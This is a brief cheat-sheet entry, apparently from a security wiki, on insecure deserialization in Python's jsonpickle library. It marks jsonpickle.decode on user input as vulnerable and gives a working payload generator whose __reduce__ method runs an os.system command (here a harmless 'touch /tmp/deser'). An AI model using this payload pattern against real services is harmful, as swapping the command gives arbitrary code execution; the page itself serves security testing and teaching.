Python JSONPickle
Function responsible for Insecure Deserialization
jsonpickle.decode(USER_INPUT) # vulnerable codeMalicious object
import os
import jsonpickle
class Shell(object):
def __reduce__(self):
return (os.system, ("touch /tmp/deser",))
print(jsonpickle.dumps(Shell()))
Last updated